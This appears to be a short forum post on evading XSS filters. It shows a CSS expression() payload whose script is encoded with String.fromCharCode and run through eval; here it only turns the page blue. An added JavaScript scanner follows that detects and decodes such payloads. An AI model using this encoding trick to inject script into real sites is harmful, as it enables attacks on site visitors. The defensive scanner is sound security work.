Many programs do not filter the CSS expression property well and are easily bypassed. If you don’t know how to use it, please refer to the cross-site script vulnerability testing process of Jianxin’s Phantom Forum.
What I want to talk about here is another method: convert the script's ASCII codes into characters, then execute the result with the eval function.
<img src="#" style="Xss:expression(eval(String.fromCharCode(
100,111,99,117,109,101,110,116,46,98,103,67,111,108,111,114,61,34,98,108,117,101,34)));">
Hehe, a lot of XSS is waiting for you to dig, ENJOY IT :)
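As an added example (not code from the original post), the script below shows why a keyword filter that looks for script text misses this payload and how a reviewer can decode it: it flags `expression(` in style attributes and expands `String.fromCharCode(...)` calls into the text they build. The function names are hypothetical and the sample HTML is constructed from the tag above.

```javascript
// Added example for triage; all function names here are hypothetical.

// Replace String.fromCharCode(100,111,...) with the quoted text it builds.
// Assumption: decimal arguments only, as in the post's payload.
function decodeCharCodes(js) {
  return js.replace(/String\s*\.\s*fromCharCode\s*\(([\d\s,]*)\)/g, (_, args) => {
    const codes = args.split(',').map(s => parseInt(s, 10)).filter(Number.isFinite);
    return JSON.stringify(String.fromCharCode(...codes));
  });
}

// Inspect one style value: flag expression() and reveal any encoded script.
function inspectStyle(style) {
  const css = style.replace(/[\r\n]+/g, '');     // the value may span several lines
  const m = /expression\s*\(/i.exec(css);        // property names and case vary ("Xss:")
  if (!m) return { hasExpression: false, decoded: null };
  return { hasExpression: true, decoded: decodeCharCodes(css.slice(m.index)) };
}

// Collect findings for every quoted style attribute in an HTML fragment.
// A regex is enough for this demo; a real filter should use an HTML parser.
function scanHtml(html) {
  const findings = [];
  const re = /\bstyle\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;
  for (const m of html.matchAll(re)) {
    const result = inspectStyle(m[1] !== undefined ? m[1] : m[2]);
    if (result.hasExpression) findings.push(result.decoded);
  }
  return findings;
}

// Constructed sample: the tag from the post next to a harmless one.
const sampleHtml =
  '<p style="color:red">ok</p>\n' +
  '<img src="#" style="Xss:expression(eval(String.fromCharCode(\n' +
  '100,111,99,117,109,101,110,116,46,98,103,67,111,108,111,114,61,34,98,108,117,101,34)));">';

console.log(scanHtml(sampleHtml));
```

A sanitizer should drop any style value that is flagged rather than try to rewrite it; the decoded text is for the analyst reading the finding.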